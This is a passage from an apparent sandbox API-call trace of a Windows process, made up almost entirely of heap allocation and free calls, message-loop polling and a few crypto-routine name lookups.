hHeap=0x970000) returned 1 [0216.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0216.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0216.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0216.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0216.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0216.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0216.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0216.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0216.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0216.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0216.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0216.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0216.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0216.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0216.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0216.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0216.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0216.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0216.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0216.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0216.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0216.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0216.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0216.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0216.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0216.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0216.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0216.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0216.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0216.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0216.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0216.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0216.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0216.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0216.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0216.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0216.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0216.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0216.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0216.286] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 1 [0216.286] TranslateMessage (lpMsg=0x8cf4a8) returned 0 [0216.286] DispatchMessageW (lpMsg=0x8cf4a8) returned 0x0 [0216.286] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0216.286] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.286] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0216.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0216.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0216.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0216.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0216.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0216.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0216.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0216.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0216.287] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0216.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0216.287] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0216.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0216.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0216.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0216.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0216.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0216.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0216.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0216.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0216.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0216.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0216.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0216.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0216.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0216.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0216.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0216.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0216.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0216.288] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0216.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0216.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0216.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0216.288] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0216.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0216.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0216.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0216.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0216.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0216.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0216.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0216.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0216.288] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0216.288] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0216.288] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0216.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0216.288] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0216.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0216.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0216.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0216.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0216.289] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0216.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0216.289] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0216.289] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0216.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0216.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0216.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0216.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0216.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0216.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0216.290] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0216.293] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0216.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0216.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0216.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0216.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0216.293] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0216.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0216.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0216.293] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0216.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0216.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0216.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0216.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0216.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0216.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0216.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0216.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0216.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0216.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0216.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0216.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0216.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0216.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0216.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0216.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0216.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0216.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0216.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0216.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0216.295] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0216.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0216.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0216.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0216.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0216.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0216.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0216.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0216.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0216.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0216.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0216.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0216.295] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0216.296] RtlAllocateHeap 